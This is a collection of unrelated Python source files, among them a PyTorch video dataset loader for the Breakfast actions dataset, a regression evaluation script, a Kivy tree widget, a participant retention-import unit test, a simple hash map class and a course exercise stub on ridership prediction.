output_samples = np.zeros((len(input_samples), self._nchannels))
for track_spec_processor, block_processing in self.block_processing_channels:
track_samples = track_spec_processor.process(sample_rate, input_samples)
block_processing.process(sample_rate, start_sample, track_samples, output_samples)
return output_samples
|
11547412
|
import os
from sklearn.model_selection import train_test_split
import torch
import cv2
import numpy as np
from torch.utils.data import Dataset
from mypath import Path
import glob
import shutil
class VideoDataset(Dataset):
r"""A Dataset for a folder of videos. Expects the directory structure to be
directory->[train/val/test]->[class labels]->[videos]. Initializes with a list
of all file names, along with an array of labels, with label being automatically
inferred from the respective folder names.
Args:
dataset (str): Name of dataset. Defaults to 'breakfast'.
split (str): Determines which folder of the directory the dataset will read from. Defaults to 'train'.
clip_len (int): Determines how many frames are there in each clip. Defaults to 16.
preprocess (bool): Determines whether to preprocess dataset. Default is False.
"""
def __init__(self, dataset='breakfast', split='train', clip_len=16, preprocess=False):
        self.root_dir, self.output_dir = Path.db_dir(dataset)  # the root and output directories are defined per dataset in mypath.py
folder = os.path.join(self.output_dir, split)
self.clip_len = clip_len
self.split = split
# The following three parameters are chosen as described in the paper section 4.1
self.resize_height = 128
self.resize_width = 171
self.crop_size = 112
if not self.check_integrity():
raise RuntimeError('Dataset not found or corrupted.' +
' You need to download it from official website.')#if the dataset directory exists then we continue to the next method
if (not self.check_preprocess()) or preprocess:
            # if the output directory doesn't exist yet, run the preprocessing step
print('Preprocessing of {} dataset, this will take long, but it will be done only once.'.format(dataset))
self.preprocess() #after preprocessing is completed we move on
# Obtain all the filenames of files inside all the class folders
# Going through each class folder one at a time
self.fnames, labels = [], []
        for label in sorted(os.listdir(folder)):  # every class folder inside <dataset>/<split>
            for fname in os.listdir(os.path.join(folder, label)):  # every clip folder inside each class folder
                self.fnames.append(os.path.join(folder, label, fname))  # full path of each clip, e.g. <split>/ApplyMakeup/ApplyMakeup123_g0
                labels.append(label)  # matching class (activity) label for each clip
        assert len(labels) == len(self.fnames)  # labels and fnames must stay aligned one-to-one
        print('Number of {} videos: {:d}'.format(split, len(self.fnames)))  # e.g. 2190 training videos for this dataset
# Prepare a mapping between the label names (strings) and indices (ints)
self.label2index = {label: index for index, label in enumerate(sorted(set(labels)))}
# Convert the list of label names into an array of label indices
self.label_array = np.array([self.label2index[label] for label in labels], dtype=int)
if dataset == "ucf101":
if not os.path.exists('dataloaders/actions_labels.txt'):
with open('dataloaders/ucf_labels.txt', 'w') as f:
for id, label in enumerate(sorted(self.label2index)):
f.writelines(str(id+1) + ' ' + label + '\n')
elif dataset == 'breakfast':
if not os.path.exists('dataloaders/actions_breakfast_labels.txt'):
with open('dataloaders/actions_labels.txt', 'w') as f:
for id, label in enumerate(sorted(self.label2index)):
f.writelines(str(id+1) + ' ' + label + '\n')
def __len__(self):
return len(self.fnames)
def __getitem__(self, index):
# Loading and preprocessing.
buffer = self.load_frames(self.fnames[index])
buffer = self.crop(buffer, self.clip_len, self.crop_size)
labels = np.array(self.label_array[index])
if self.split == 'test':
# Perform data augmentation
buffer = self.randomflip(buffer)
buffer = self.normalize(buffer)
buffer = self.to_tensor(buffer)
return torch.from_numpy(buffer), torch.from_numpy(labels)
def check_integrity(self):
if not os.path.exists(self.root_dir):
return False
else:
return True
def check_preprocess(self):
# TODO: Check image size in output_dir
if not os.path.exists(self.output_dir):
return False
elif not os.path.exists(os.path.join(self.output_dir, 'train')):
return False
for ii, video_class in enumerate(os.listdir(os.path.join(self.output_dir, 'train'))):
for video in os.listdir(os.path.join(self.output_dir, 'train', video_class)):
video_name = os.path.join(os.path.join(self.output_dir, 'train', video_class, video),
sorted(os.listdir(os.path.join(self.output_dir, 'train', video_class, video)))[0])
image = cv2.imread(video_name)
if np.shape(image)[0] != 128 or np.shape(image)[1] != 171:
return False
else:
break
if ii == 10:
break
return True
def preprocess(self):#jumps to preprocess
local_dir ="./break_not" #local output_directory
if not os.path.exists(local_dir):
os.mkdir(local_dir)
# Split train/val/test sets
count_d = 3
num_videos = 0
num_actions = 0
sframes,fframes,f_actions = [] , [] , []
for file in os.listdir(self.root_dir): #for any file inside the root directory
file_path = os.path.join(self.root_dir, file) #file path will be the path of the joined filename
for file2 in os.listdir(file_path): #create another loop to accommodate the second file
file_path_angle = os.path.join(file_path, file2) #add another path to the folder
#video_files=[name for name in os.list.dir(file_path_angle)] #this will give all the files on a list saved
                video_files = [f for f in glob.glob(os.path.join(file_path_angle, '*.avi'))]  # glob gives the same list as the commented os.listdir approach above
for filename_actions in glob.glob(os.path.join(file_path_angle, '*.txt')): #so for all the text files in etc. breakfast->PO4->stereo
#Convert the text_file to a .avi extension to compare the names
compare_name = filename_actions.split('.')
#print(compare_name)
txt_to_avi="."+str(compare_name[1])+".avi"
index = video_files.index(txt_to_avi)#print(str(num_videos)+ "our video is"+str(video_files[num_actions])+"but the filename is"+str(filename_actions))
print("The textfile is "+txt_to_avi+ " whereas, the video file is "+video_files[index])
with open(filename_actions, 'r') as f:
lines = f.readlines()
for i,file_line in enumerate(lines):
space = file_line.rsplit(' ') #splits the frames with the action list
f_actions.append(file_line.split(' ')[1]) # actions list stores all the actions for each video
frames =space[0].split('-') #frames get the initial and final frames for each action
sframes.append(frames[0]) #the sframes list stores all the start frames for each action
fframes.append(frames[1]) # the fframes list stores all the end frames for each action
#print("So for"+str(video_files[index])+"the text file was"+str(filename_actions[num_videos])+ "and the action was "+ str(f_actions[num_actions]))
self.process_video(file,file2,video_files[index],f_actions[num_actions],sframes[num_actions],fframes[num_actions],local_dir)
num_actions+=1
num_videos+=1
count_d+=1
print('Preprocessing finished.')
self.divide_dataset(local_dir)
def divide_dataset(self, root_dir):
if os.path.exists(self.output_dir):
if not os.path.exists(os.path.join(self.output_dir,'train')):
os.mkdir(os.path.join(self.output_dir,'train')) #create the first directory
os.mkdir(os.path.join(self.output_dir,'val')) # 2nd directory
os.mkdir(os.path.join(self.output_dir,'test')) #3 directory
else:
os.mkdir(self.output_dir)
os.mkdir(os.path.join(self.output_dir,'train')) #create the first directory
os.mkdir(os.path.join(self.output_dir, 'val')) # 2nd directory
os.mkdir(os.path.join(self.output_dir, 'test')) #3 directory
# Split train/val/test sets
for file in os.listdir(root_dir): #for any file inside the root directory
action_folder_path = os.path.join(root_dir, file) #file path will be the path of the joined filename
frame_folder_files = [name for name in os.listdir(action_folder_path)]
            train_and_valid, test = train_test_split(frame_folder_files, test_size=0.2, random_state=42)  # the test set is 20% of the data (sklearn helper)
            train, val = train_test_split(train_and_valid, test_size=0.2, random_state=42)  # the validation set is 20% of the remainder, leaving ~64% for training
#Define the training, validation and testing directories that the frame folders will be moved to.
            train_dir = os.path.join(self.output_dir, 'train', file)  # e.g. break/train/stir_milk
            val_dir = os.path.join(self.output_dir, 'val', file)  # e.g. break/val/stir_milk
            test_dir = os.path.join(self.output_dir, 'test', file)  # e.g. break/test/stir_milk
if not os.path.exists(train_dir):
os.mkdir(train_dir)
if not os.path.exists(val_dir):
os.mkdir(val_dir)
if not os.path.exists(test_dir):
os.mkdir(test_dir)
for frame_folders in train:
#get only the last directory of the path frame_folders
frame_folder = os.path.join(root_dir,file,frame_folders)
shutil.move(frame_folder,train_dir)
for frame_folders in val:
frame_folder = os.path.join(root_dir,file,frame_folders)
shutil.move(frame_folder,val_dir)
for frame_folders in test:
frame_folder = os.path.join(root_dir,file,frame_folders)
shutil.move(frame_folder,test_dir)
print('Dataset Division finished.')
    def process_video(self, file, file2, video, f_actions, sframes, fframes, save_dir):  # f_actions is the action name for this segment; sframes/fframes are its start and end frame numbers
# Initialize a VideoCapture object to read video data into a numpy array
head, tail = os.path.split(video)
video_filename = tail.split('.')[0] #from the video file we take only the name of it and set it as the name of the new folder created (for us this will not be needed)
#print(video_filename)
        capture = cv2.VideoCapture(video)  # now, using the cv2 library, we start a capture for the video in the root directory path
#convert the string list to an integer list
#sframes=list(map(int,sframes))
#fframes=list(map(int,fframes))
frame_count = int(capture.get(cv2.CAP_PROP_FRAME_COUNT)) #get numbers of frames for the video
frame_width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH)) #get the frame width
frame_height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT)) #get the frame height
        # Make sure the split video has at least 16 frames
EXTRACT_FREQUENCY = 4
if frame_count // EXTRACT_FREQUENCY <= 16:
EXTRACT_FREQUENCY -= 1
if frame_count // EXTRACT_FREQUENCY <= 16:
EXTRACT_FREQUENCY -= 1
if frame_count // EXTRACT_FREQUENCY <= 16:
EXTRACT_FREQUENCY -= 1
count = 0 #it starts from 0
i = 1 #it starts at 1 because all are frames start from 1 not 0
retaining = True
#stop = 0 #initialisation of stop
#stop_count = 0 #set it as 0 initially to get the first element of the sframes and fframes lists
#three=3
#stop = "".join(map(str, fframes)) #define stop as the final frame etc.110
#start ="".join(map(str, sframes))
#print(stop)
#print(start)
#convert to int
stop = int(fframes)
start =int(sframes)
f_name = f_actions #this will be the action name
dataset_directory =save_dir
#print(frame_count )#count, frame_count, retaining)
while (count < frame_count and retaining): #so as long as the counter is less than the total number of frames and retaining variable is true
retaining, frame = capture.read() # we keep reading the frames from the video
#print("The number of "+ str(count) +"and the number of frames "+ str(stop))
if frame is None:
continue
#dataset_directory = os.path.dirname(save_dir) #remove the previous folder-component of the path ,we are left only with the directory. etc. C:/break/train
save_dir1 = os.path.join(dataset_directory,str(f_name)) #this is the final save directory. It will be of the form C:/break/train/stir_milk
            if not os.path.exists(save_dir1):  # create the action-name folder if it doesn't exist
os.mkdir(save_dir1)
video_filename_path = str(file)+"_"+str(file2)+"_"+str(video_filename)+"_"+str(start)+"_"+str(stop)
            if not os.path.exists(os.path.join(save_dir1, video_filename_path)):  # create the per-clip folder if it doesn't exist
os.mkdir(os.path.join(save_dir1, video_filename_path)) #make it
#print(count % EXTRACT_FREQUENCY)
if count>=start: #count % EXTRACT_FREQUENCY == 0:
#define the video_filename path
#video_filename_path = str(file)+"_"+str(file2)+"_"+str(video_filename)+"_"+str(sframes[stop_count])+"_"+str(fframes[stop_count])
#print("write") #store all the frames accordning to its frame number .The dirname removes the last folder-component from the save_directory
if(count==stop):
#print( "the" + str(stop)+ " is " + str(video_filename_path)+"at frame"+str(count)) #check which video stops
break
#if statement to check if we need to switch the frame packet
if (frame_height != self.resize_height) or (frame_width != self.resize_width):
frame = cv2.resize(frame, (self.resize_width, self.resize_height))
cv2.imwrite(filename=os.path.join(save_dir1, video_filename_path, '0{}.jpg'.format(str(i))), img=frame)
i += 1
count += 1 #and keep counting until the video is fully read and saved
# Release the VideoCapture once it is no longer needed
capture.release()
def randomflip(self, buffer):
"""Horizontally flip the given image and ground truth randomly with a probability of 0.5."""
        if np.random.random() < 0.5:
            for i, frame in enumerate(buffer):
                buffer[i] = cv2.flip(frame, flipCode=1)  # flip each frame horizontally
return buffer
def normalize(self, buffer):
for i, frame in enumerate(buffer):
frame -= np.array([[[90.0, 98.0, 102.0]]])
buffer[i] = frame
return buffer
def to_tensor(self, buffer):
return buffer.transpose((3, 0, 1, 2))
def load_frames(self, file_dir):
frames = sorted([os.path.join(file_dir, img) for img in os.listdir(file_dir)])
frame_count = len(frames)
while frame_count <= 16:
frame_count += 1
buffer = np.empty((frame_count, self.resize_height, self.resize_width, 3), np.dtype('float32'))
i = 0
frame = None
for _, frame_name in enumerate(frames):
frame = np.array(cv2.imread(frame_name)).astype(np.float64)
buffer[i] = frame
i += 1
#if frame is None:
#print(file_dir)
        while i < frame_count:  # pad short clips by repeating the last frame
buffer[i] = frame
i+=1
return buffer
def crop(self, buffer, clip_len, crop_size):
# randomly select time index for temporal jittering
time_index = np.random.randint(buffer.shape[0] - clip_len)
# Randomly select start indices in order to crop the video
height_index = np.random.randint(buffer.shape[1] - crop_size)
width_index = np.random.randint(buffer.shape[2] - crop_size)
# Crop and jitter the video using indexing. The spatial crop is performed on
# the entire array, so each frame is cropped in the same location. The temporal
# jitter takes place via the selection of consecutive frames
buffer = buffer[time_index:time_index + clip_len,
height_index:height_index + crop_size,
width_index:width_index + crop_size, :]
return buffer
if __name__ == "__main__":
from torch.utils.data import DataLoader
train_data = VideoDataset(dataset='breakfast', split='test', clip_len=8, preprocess=False) #execute the class for the test dataset ( i have the impression the validation dataset is never executed)
train_loader = DataLoader(train_data, batch_size=100, shuffle=True, num_workers=4)
for i, sample in enumerate(train_loader):
inputs = sample[0]
labels = sample[1]
print(inputs.size())
print(labels)
if i == 1:
break
|
11547425
|
from sklearn.linear_model import LinearRegression
import numpy as np
import torch
import pickle
import joblib
import time
import os.path
from os import path
from training.baseline import baseline_inpute
from utils.utils import construct_missing_X_from_mask
def linear_regression(data, args, log_path, load_path):
t0 = time.time()
n_row, n_col = data.df_X.shape
x = data.x.clone().detach()
edge_index = data.edge_index.clone().detach()
train_edge_mask = data.train_edge_mask.numpy()
train_edge_index = data.train_edge_index.clone().detach()
train_edge_attr = data.train_edge_attr.clone().detach()
test_edge_index = data.test_edge_index.clone().detach()
test_edge_attr = data.test_edge_attr.clone().detach()
y = data.y.detach().numpy()
train_y_mask = data.train_y_mask.clone().detach()
# print(torch.sum(train_y_mask))
test_y_mask = data.test_y_mask.clone().detach()
y_train = y[train_y_mask]
y_test = y[test_y_mask]
if args.method == 'gnn':
model = torch.load(load_path+'model.pt',map_location=torch.device('cpu'))
model.eval()
impute_model = torch.load(load_path+'impute_model.pt',map_location=torch.device('cpu'))
impute_model.eval()
predict_model = torch.load(load_path+'predict_model.pt',map_location=torch.device('cpu'))
predict_model.eval()
t_load = time.time()
with torch.no_grad():
x_embd = model(x, train_edge_attr, train_edge_index)
X = impute_model([x_embd[edge_index[0, :int(n_row * n_col)]], x_embd[edge_index[1, :int(n_row * n_col)]]])
t_impute = time.time()
X = torch.reshape(X, [n_row, n_col])
y_pred = predict_model(X)[:, 0]
y_pred_test = y_pred[test_y_mask].detach().numpy()
t_reg = time.time()
else:
if args.method == 'gnn_mdi':
model = torch.load(load_path+'model.pt',map_location=torch.device('cpu'))
model.eval()
impute_model = torch.load(load_path+'impute_model.pt',map_location=torch.device('cpu'))
impute_model.eval()
t_load = time.time()
with torch.no_grad():
x_embd = model(x, train_edge_attr, train_edge_index)
x_pred = impute_model([x_embd[test_edge_index[0], :], x_embd[test_edge_index[1], :]])
t_impute = time.time()
x_pred = x_pred[:int(test_edge_attr.shape[0] / 2)]
X_true, X_incomplete = construct_missing_X_from_mask(train_edge_mask, data.df_X)
X = X_incomplete
for i in range(int(test_edge_attr.shape[0] / 2)):
assert X_true[test_edge_index[0, i], test_edge_index[1, i] - y.shape[0]] == test_edge_attr[i]
X[test_edge_index[0, i], test_edge_index[1, i] - y.shape[0]] = x_pred[i]
else:
X_true, X_incomplete = construct_missing_X_from_mask(train_edge_mask, data.df_X)
t_load = time.time()
X = baseline_inpute(X_incomplete, args.method, args.level)
t_impute = time.time()
reg = LinearRegression().fit(X[train_y_mask, :], y_train)
y_pred_test = reg.predict(X[test_y_mask, :])
t_reg = time.time()
rmse = np.sqrt(np.mean((y_pred_test - y_test) ** 2))
mae = np.mean(np.abs(y_pred_test - y_test))
t_test = time.time()
if path.exists(log_path + 'result.pkl'):
obj = joblib.load(log_path + 'result.pkl')
obj['args_linear_regression'] = args
else:
obj = dict()
obj['args'] = args
obj['load_path'] = load_path
obj['rmse'] = rmse
obj['mae'] = mae
obj['load_time'] = t_load - t0
obj['impute_time'] = t_impute - t_load
obj['reg_time'] = t_reg - t_impute
obj['test_time'] = t_test - t_reg
print('{}: rmse: {:.3g}, mae: {:.3g}'.format(args.method,rmse,mae))
pickle.dump(obj, open(log_path + 'result.pkl', "wb"))
|
11547459
|
import os,rootpath
rootpath.append(pattern='main.py')  # add the directory containing main.py to sys.path
from kivy.uix.treeview import TreeView,TreeViewLabel
from kivy.uix.scrollview import ScrollView
from kivy.app import App
from kivy.properties import ObjectProperty
from kivy.core.window import Window
from kivy.uix.boxlayout import BoxLayout
import pysnooper
from plugins.display.resource_tree.tree_widget import TreeWidget
class ResourceTree(BoxLayout):
data=ObjectProperty(lambda:None)
def __init__(self, **kwargs):
super(ResourceTree, self).__init__()
self.bind(data=self.refresh)
self.size_hint_y = None
self.bind(minimum_height = self.setter('height'))
# self.bind(selected_node = self.update_selection)
self.hide_root=True
# @pysnooper.snoop()
def refresh(self,*arg):
if not hasattr(self.data,'tree'):
return
self.tree=TreeWidget(self.data.tree)
self.tree.bind(select_idx=self.data.setter('select_idx'))
self.tree.select_idx = self.auto_select()
self.clear_widgets()
self.add_widget(self.tree)
def auto_select(self):
try:
selected_data = self.data.get_selected_data()
if len(selected_data['children'])>0:
return self.data.select_idx + [len(selected_data['children'])-1]
else:
return self.data.select_idx
except Exception as e:
print (e)
class TestApp(App):
def __init__(self):
super(TestApp, self).__init__()
self.resource_tree=ResourceTree()
self.resource_tree.data.tree={'node_id': '1',
'children': [{'node_id': '1.1',
'children': [{'node_id': '1.1.1',
'children': [{'node_id': '1.1.1.1',
'children': []}]},
{'node_id': '1.1.2',
'children': []},
{'node_id': '1.1.3',
'children': []}]},
{'node_id': '1.2',
'children': []}]}
self.resource_tree.refresh()
def build(self):
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
root=BoxLayout()
window=ScrollView(scroll_type=["bars"], bar_width=20)
root.add_widget(window)
window.add_widget(self.resource_tree)
return root
if __name__ == '__main__':
TestApp().run()
|
11547495
|
import datetime
import pytz
from tests import test_data
from rdr_service.api_util import open_cloud_file
from rdr_service.offline import retention_eligible_import
from rdr_service import clock
from rdr_service.participant_enums import RetentionStatus, RetentionType
from tests.helpers.unittest_base import BaseTestCase
_FAKE_RETENTION_ELIGIBLE_BUCKET = "rdr_fake_retention_eligible_bucket"
TIME_1 = datetime.datetime(2020, 4, 1)
class RetentionEligibleImportTest(BaseTestCase):
def setUp(self):
super(RetentionEligibleImportTest, self).setUp()
def test_retention_eligible_import(self):
ps1 = self.data_generator.create_database_participant_summary()
ps2 = self.data_generator.create_database_participant_summary()
ps3 = self.data_generator.create_database_participant_summary()
ps4 = self.data_generator.create_database_participant_summary()
ps5 = self.data_generator.create_database_participant_summary()
participant_ids = [ps1.participantId, ps2.participantId, ps3.participantId, ps4.participantId]
bucket_name = _FAKE_RETENTION_ELIGIBLE_BUCKET
test_file = 'retention_test.csv'
test_date = datetime.datetime(2020, 10, 13, 0, 0, 0, 0)
pytz.timezone('US/Central').localize(test_date)
with clock.FakeClock(test_date):
self._create_ingestion_test_file(test_file, bucket_name, participant_ids)
task_data = {
"bucket": bucket_name,
"upload_date": test_date.isoformat(),
"file_path": bucket_name + '/' + test_file
}
retention_eligible_import.import_retention_eligible_metrics_file(task_data)
psr1 = self.send_get(f'Participant/P{ps1.participantId}/Summary')
self.assertEqual(psr1.get('retentionEligibleStatus'), str(RetentionStatus.ELIGIBLE))
self.assertEqual(psr1.get('retentionEligibleTime'), '2020-02-20T00:00:00')
self.assertEqual(psr1.get('lastActiveRetentionActivityTime'), '2020-02-10T00:00:00')
self.assertEqual(psr1.get('retentionType'), str(RetentionType.ACTIVE))
psr2 = self.send_get(f'Participant/P{ps2.participantId}/Summary')
self.assertEqual(psr2.get('retentionEligibleStatus'), str(RetentionStatus.ELIGIBLE))
self.assertEqual(psr2.get('retentionEligibleTime'), '2020-02-20T00:00:00')
self.assertEqual(psr2.get('lastActiveRetentionActivityTime'), '2020-02-10T00:00:00')
self.assertEqual(psr2.get('retentionType'), str(RetentionType.PASSIVE))
psr3 = self.send_get(f'Participant/P{ps3.participantId}/Summary')
self.assertEqual(psr3.get('retentionEligibleStatus'), str(RetentionStatus.ELIGIBLE))
self.assertEqual(psr3.get('retentionEligibleTime'), '2020-02-20T00:00:00')
self.assertEqual(psr3.get('lastActiveRetentionActivityTime'), '2020-02-10T00:00:00')
self.assertEqual(psr3.get('retentionType'), str(RetentionType.ACTIVE_AND_PASSIVE))
psr4 = self.send_get(f'Participant/P{ps4.participantId}/Summary')
self.assertEqual(psr4.get('retentionEligibleStatus'), str(RetentionStatus.NOT_ELIGIBLE))
self.assertEqual(psr4.get('retentionEligibleTime'), None)
self.assertEqual(psr4.get('retentionType'), 'UNSET')
psr5 = self.send_get(f'Participant/P{ps5.participantId}/Summary')
self.assertEqual(psr5.get('retentionEligibleStatus'), 'UNSET')
self.assertEqual(psr5.get('retentionEligibleTime'), None)
self.assertEqual(psr5.get('retentionType'), 'UNSET')
# test update with new file
test_file = 'retention_test_2.csv'
test_date = datetime.datetime(2020, 10, 14, 0, 0, 0, 0)
pytz.timezone('US/Central').localize(test_date)
with clock.FakeClock(test_date):
self._create_ingestion_test_file(test_file, bucket_name, participant_ids)
task_data = {
"bucket": bucket_name,
"upload_date": test_date.isoformat(),
"file_path": bucket_name + '/' + test_file
}
retention_eligible_import.import_retention_eligible_metrics_file(task_data)
psr1 = self.send_get(f'Participant/P{ps1.participantId}/Summary')
self.assertEqual(psr1.get('retentionEligibleStatus'), str(RetentionStatus.ELIGIBLE))
self.assertEqual(psr1.get('retentionEligibleTime'), '2020-03-20T00:00:00')
self.assertEqual(psr1.get('lastActiveRetentionActivityTime'), '2020-03-10T00:00:00')
self.assertEqual(psr1.get('retentionType'), str(RetentionType.PASSIVE))
psr2 = self.send_get(f'Participant/P{ps2.participantId}/Summary')
self.assertEqual(psr2.get('retentionEligibleStatus'), str(RetentionStatus.NOT_ELIGIBLE))
self.assertEqual(psr2.get('retentionEligibleTime'), None)
self.assertEqual(psr2.get('retentionType'), 'UNSET')
psr3 = self.send_get(f'Participant/P{ps3.participantId}/Summary')
self.assertEqual(psr3.get('retentionEligibleStatus'), str(RetentionStatus.ELIGIBLE))
self.assertEqual(psr3.get('retentionEligibleTime'), '2020-02-20T00:00:00')
self.assertEqual(psr3.get('lastActiveRetentionActivityTime'), '2020-02-10T00:00:00')
self.assertEqual(psr3.get('retentionType'), str(RetentionType.ACTIVE_AND_PASSIVE))
psr4 = self.send_get(f'Participant/P{ps4.participantId}/Summary')
self.assertEqual(psr4.get('retentionEligibleStatus'), str(RetentionStatus.ELIGIBLE))
self.assertEqual(psr4.get('retentionEligibleTime'), '2020-03-20T00:00:00')
self.assertEqual(psr4.get('lastActiveRetentionActivityTime'), '2020-03-10T00:00:00')
self.assertEqual(psr4.get('retentionType'), str(RetentionType.ACTIVE))
psr5 = self.send_get(f'Participant/P{ps5.participantId}/Summary')
self.assertEqual(psr5.get('retentionEligibleStatus'), 'UNSET')
self.assertEqual(psr5.get('retentionEligibleTime'), None)
self.assertEqual(psr5.get('retentionType'), 'UNSET')
ps = self.send_get("ParticipantSummary?retentionEligibleStatus=NOT_ELIGIBLE&_includeTotal=TRUE")
self.assertEqual(len(ps['entry']), 1)
ps = self.send_get("ParticipantSummary?retentionEligibleStatus=ELIGIBLE&_includeTotal=TRUE")
self.assertEqual(len(ps['entry']), 3)
ps = self.send_get("ParticipantSummary?retentionType=ACTIVE_AND_PASSIVE&retentionEligibleStatus=ELIGIBLE"
"&_includeTotal=TRUE")
self.assertEqual(len(ps['entry']), 1)
ps = self.send_get("ParticipantSummary?retentionType=PASSIVE&retentionEligibleStatus=ELIGIBLE"
"&_includeTotal=TRUE")
self.assertEqual(len(ps['entry']), 1)
ps = self.send_get("ParticipantSummary?retentionType=UNSET&_includeTotal=TRUE")
self.assertEqual(len(ps['entry']), 2)
ps = self.send_get("ParticipantSummary?retentionType=UNSET&retentionEligibleStatus=NOT_ELIGIBLE"
"&_includeTotal=TRUE")
self.assertEqual(len(ps['entry']), 1)
def test_lower_env_retention_metric_cronjob(self):
ps1 = self.data_generator.create_database_participant_summary()
ps2 = self.data_generator.create_database_participant_summary(
consentForStudyEnrollmentAuthored=TIME_1,
sampleStatus1ED10Time=TIME_1,
questionnaireOnTheBasicsAuthored=TIME_1,
questionnaireOnOverallHealthAuthored=TIME_1,
questionnaireOnLifestyleAuthored=TIME_1,
consentForElectronicHealthRecordsAuthored=TIME_1,
consentForDvElectronicHealthRecordsSharingAuthored=TIME_1,
consentForStudyEnrollment=1,
consentForElectronicHealthRecords=1,
questionnaireOnTheBasics=1,
questionnaireOnOverallHealth=1,
questionnaireOnLifestyle=1,
withdrawalStatus=1,
suspensionStatus=1,
samplesToIsolateDNA=1
)
retention_window = datetime.timedelta(days=100)
in_eighteen_month = datetime.datetime.now() - retention_window
ps3 = self.data_generator.create_database_participant_summary(
consentForStudyEnrollmentAuthored=TIME_1,
sampleStatus1ED10Time=TIME_1,
questionnaireOnTheBasicsAuthored=TIME_1,
questionnaireOnOverallHealthAuthored=TIME_1,
questionnaireOnLifestyleAuthored=TIME_1,
consentForElectronicHealthRecordsAuthored=TIME_1,
consentForDvElectronicHealthRecordsSharingAuthored=TIME_1,
questionnaireOnHealthcareAccessAuthored=in_eighteen_month,
consentForStudyEnrollment=1,
consentForElectronicHealthRecords=1,
questionnaireOnTheBasics=1,
questionnaireOnOverallHealth=1,
questionnaireOnLifestyle=1,
withdrawalStatus=1,
suspensionStatus=1,
samplesToIsolateDNA=1
)
ps4 = self.data_generator.create_database_participant_summary(
consentForStudyEnrollmentAuthored=TIME_1,
sampleStatus1ED10Time=TIME_1,
questionnaireOnTheBasicsAuthored=TIME_1,
questionnaireOnOverallHealthAuthored=TIME_1,
questionnaireOnLifestyleAuthored=TIME_1,
consentForElectronicHealthRecordsAuthored=TIME_1,
consentForDvElectronicHealthRecordsSharingAuthored=TIME_1,
questionnaireOnHealthcareAccessAuthored=in_eighteen_month,
ehrUpdateTime=in_eighteen_month,
consentForStudyEnrollment=1,
consentForElectronicHealthRecords=1,
questionnaireOnTheBasics=1,
questionnaireOnOverallHealth=1,
questionnaireOnLifestyle=1,
withdrawalStatus=1,
suspensionStatus=1,
samplesToIsolateDNA=1
)
retention_eligible_import.calculate_retention_eligible_metrics()
p1 = self.send_get(f'Participant/P{ps1.participantId}/Summary')
p2 = self.send_get(f'Participant/P{ps2.participantId}/Summary')
p3 = self.send_get(f'Participant/P{ps3.participantId}/Summary')
p4 = self.send_get(f'Participant/P{ps4.participantId}/Summary')
self.assertEqual(p1['retentionEligibleStatus'], str(RetentionStatus.NOT_ELIGIBLE))
self.assertEqual(p1['retentionType'], str(RetentionType.UNSET))
self.assertEqual(p2['retentionEligibleStatus'], str(RetentionStatus.ELIGIBLE))
self.assertEqual(p2['retentionEligibleTime'], TIME_1.strftime("%Y-%m-%dT%H:%M:%S"))
self.assertEqual(p2['retentionType'], str(RetentionType.PASSIVE))
self.assertEqual(p3['retentionEligibleStatus'], str(RetentionStatus.ELIGIBLE))
self.assertEqual(p3['retentionEligibleTime'], TIME_1.strftime("%Y-%m-%dT%H:%M:%S"))
self.assertEqual(p3['retentionType'], str(RetentionType.ACTIVE))
self.assertEqual(p4['retentionEligibleStatus'], str(RetentionStatus.ELIGIBLE))
self.assertEqual(p4['retentionEligibleTime'], TIME_1.strftime("%Y-%m-%dT%H:%M:%S"))
self.assertEqual(p4['retentionType'], str(RetentionType.ACTIVE_AND_PASSIVE))
def _create_ingestion_test_file(self, test_data_filename, bucket_name, participant_ids, folder=None):
test_data_file = self._open_test_file(test_data_filename, participant_ids)
self._write_cloud_csv(test_data_filename, test_data_file, folder=folder, bucket=bucket_name)
def _open_test_file(self, test_filename, participant_ids=None):
with open(test_data.data_path(test_filename)) as f:
lines = f.readlines()
csv_str = ""
for idx, line in enumerate(lines):
if '{pid}' in line:
line = line.replace('{pid}', str(participant_ids[idx-1]))
csv_str += line
return csv_str
def _write_cloud_csv(self, file_name, contents_str, bucket=None, folder=None):
if folder is None:
path = "/%s/%s" % (bucket, file_name)
else:
path = "/%s/%s/%s" % (bucket, folder, file_name)
with open_cloud_file(path, mode='wb') as cloud_file:
cloud_file.write(contents_str.encode("utf-8"))
|
11547501
|
import sys
import re
import string
class TclToCsHashMap:
keys = []
values = []
def __init__(self):
self.keys = []
self.values = []
def AddItem(self, key, value):
for i in range(len(self.keys)):
if key == self.keys[i]:
# print "Warning: Key already exists, value overwritten\n"
self.values[i] = value
return -1
pass
self.keys.append(key)
self.values.append(value)
    def RemoveItem(self, key):
        # look the index up once; popping from keys first would invalidate it
        index = self.GetItemIndex(key)
        if index is None:
            return None
        self.keys.pop(index)
        self.values.pop(index)
def GetItemIndex(self,key):
for i in range(len(self.keys)):
if key == self.keys[i]:
return i
def GetItem(self,key):
try:
return self.values[self.GetItemIndex(key)]
except:
return None
def CombineWith(self,p):
for i in range(len(p.keys)):
self.AddItem(p.keys[i],p.values[i])
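# Minimal usage sketch of the map above (not part of the original module):
if __name__ == "__main__":
    m = TclToCsHashMap()
    m.AddItem("host", "localhost")
    m.AddItem("port", 8080)
    m.AddItem("host", "127.0.0.1")  # overwrites the existing value for "host"
    print(m.GetItem("host"))   # 127.0.0.1
    m.RemoveItem("port")
    print(m.GetItem("port"))   # None once the key has been removed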
|
11547516
|
import numpy as np
import pandas as pd
import scipy
import statsmodels
"""
In this optional exercise, you should complete the function called
predictions(turnstile_weather). This function takes in our pandas
turnstile weather dataframe, and returns a set of predicted ridership values,
based on the other information in the dataframe.
You should attempt to implement another type of linear regression,
that you may have read about, such as ordinary least squares regression:
http://en.wikipedia.org/wiki/Ordinary_least_squares
This is your playground. Go wild!
How does your choice of linear regression compare to linear regression
with gradient descent?
You can look at the information contained in the turnstile_weather dataframe below:
https://www.dropbox.com/s/meyki2wl9xfa7yk/turnstile_data_master_with_weather.csv
Note: due to the memory and CPU limitation of our amazon EC2 instance, we will
give you a random subset (~15%) of the data contained in turnstile_data_master_with_weather.csv
If you receive a "server has encountered an error" message, that means you are hitting
the 30 second limit that's placed on running your program. See if you can optimize your code so it
runs faster.
"""
def predictions(dataframe):
#
# Your implementation goes here. Feel free to write additional
# helper functions
#
    dummy_units = pd.get_dummies(dataframe['UNIT'], prefix='unit')
